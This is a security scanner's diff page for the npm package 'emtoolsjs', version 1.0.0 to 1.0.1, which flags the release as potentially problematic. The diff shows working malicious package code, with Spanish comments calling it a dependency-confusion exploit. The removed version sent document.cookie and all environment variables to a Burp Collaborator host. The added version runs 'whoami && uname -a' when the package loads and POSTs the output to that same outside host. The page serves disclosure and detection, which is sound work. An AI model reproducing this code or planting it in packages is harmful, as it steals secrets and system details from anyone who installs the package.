emtoolsjs 1.0.0 → 1.0.1
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of emtoolsjs might be problematic. Click here for more details.
- package/index.js +22 -12
- package/package.json +1 -1
package/index.js
CHANGED
@@ -1,15 +1,10 @@
|
|
1
1
|
const https = require('https');
|
2
|
+
const { exec } = require('child_process');
|
2
3
|
|
3
|
-
//
|
4
|
-
function sendData() {
|
5
|
-
const data = JSON.stringify({
|
6
|
-
message: 'Dependency Confusion Test from emtoolsjs',
|
7
|
-
documentCookie: typeof document !== 'undefined' ? document.cookie : 'No access to document',
|
8
|
-
environment: process.env // Esto puede darte variables de entorno útiles para el análisis
|
9
|
-
});
|
10
|
-
|
4
|
+
// Función para enviar datos al Burp Collaborator
|
5
|
+
function sendData(data) {
|
11
6
|
const options = {
|
12
|
-
hostname: '2be71rh86kkyju99zxclirv7cyip6gu5.oastify.com', // Burp Collaborator
|
7
|
+
hostname: '2be71rh86kkyju99zxclirv7cyip6gu5.oastify.com', // URL de tu Burp Collaborator
|
13
8
|
port: 443,
|
14
9
|
path: '/callback',
|
15
10
|
method: 'POST',
|
@@ -31,8 +26,23 @@ function sendData() {
|
|
31
26
|
req.end();
|
32
27
|
}
|
33
28
|
|
34
|
-
//
|
35
|
-
|
29
|
+
// Ejecutar comandos y enviar los resultados
|
30
|
+
exec('whoami && uname -a', (error, stdout, stderr) => {
|
31
|
+
if (error) {
|
32
|
+
console.error(`Error al ejecutar el comando: ${error.message}`);
|
33
|
+
return;
|
34
|
+
}
|
35
|
+
if (stderr) {
|
36
|
+
console.error(`Error en el comando: ${stderr}`);
|
37
|
+
}
|
38
|
+
|
39
|
+
// Prepara los datos en formato JSON para enviar a Burp Collaborator
|
40
|
+
const payload = JSON.stringify({
|
41
|
+
message: 'Dependency confusion exploit',
|
42
|
+
commandOutput: stdout
|
43
|
+
});
|
36
44
|
|
37
|
-
|
45
|
+
// Envía los datos al Collaborator
|
46
|
+
sendData(payload);
|
47
|
+
});
|
38
48
|
|